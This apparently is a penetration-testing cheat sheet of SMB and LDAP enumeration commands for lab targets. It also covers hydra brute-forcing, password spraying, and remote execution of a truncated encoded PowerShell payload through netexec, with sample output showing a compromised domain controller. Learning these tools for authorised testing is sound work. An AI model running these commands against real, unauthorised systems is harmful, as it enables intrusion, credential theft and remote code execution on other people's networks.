tip - use command recurse before ls or dir

  • nxc smb 192.168.101.100 -u '' -p '' --shares
  • nxc smb 192.168.101.100 -u '' -p '' --users
  • nxc ldap 10.10.10.10 -u '' -p '' -M get-desc-users
  • nxc ldap 10.10.10.10 -u '' -p '' --password-not-required --admin-count --users --groups
  • nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 $IP -Pn (SambaCry and EternalBlue)

To probe NetBIOS info: nbtscan -v ​$IP -The hex codes reference different services. You can look up what they mean, but 20 means File Sharing services.

  • http://www.pyeung.com/pages/microsoft/winnt/netbioscodes.html

smbclient

To list what resources are being shared on a system:

  • smbclient -L $IP -N
    • with no creds
  • smbclient -L $IP -U $user
  • smbclient //$IP/$shareName -U $user%$password
  • smbclient //$IP/$shareName -U $user --pw-nt-hash $NTLMHash
  • smbclient //$IP/$shareName --directory path/to/directory --command "get file.txt"
    • to download file
  • smbclient //$IP/$shareName --directory path/to/directory --command "put file.txt"
    • to upload file

Format

Linux: smbclient //server/share Windows: smbclient //server/share or smbclient \\\\server\\share

To display share information on a system:

  • nmblookup -A ​$IP

Enum4linux is a great tool to gather information through SMB (note, it tests anonymous login only by default):

  • enum4linux -a ​$IP
  • try also ?: enum4linux-ng -a ​$IP

Brute force using hydra: hydra -l $User -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt smb://$IP/ -V -I

smbmap

smbmap -u $user -p $password -d INLANEFREIGHT.LOCAL -H $IP -R '$directory' --dir-only - use without --dir-only to show all files

to get all files from an smb share

  1. smbclient \\\\$IP\\SYSVOL -U "domain.offsec\$username"
  2. recurse on
  3. prompt off
  4. mget *
  5. exit
  6. find . -type f
    1. This lists all the files you have downloaded into the directory you downloaded them into

Command Execution with NXC:

  • nxc smb 10.10.10.10 -u Username -p Password -X 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AY...AKAApAA==' 
    netexec smb 10.10.10.10 -u Username -p Password -X 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AY...AKAApAA=='
SMB         10.10.10.10   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:EXAMPLE.com) (signing:True) (SMBv1:False)
SMB         10.10.10.10   445    DC               [+] EXAMPLE.com\Username:Password (Pwn3d!)
SMB         10.10.10.10   445    DC               [-] WMIEXEC: Could not retrieve output file, it may have been detected by AV. If it is still failing, try the 'wmi' protocol or another exec method

Password Spraying

nxc smb $IP -u users.txt -p 'password' -d domain.com --continue-on-success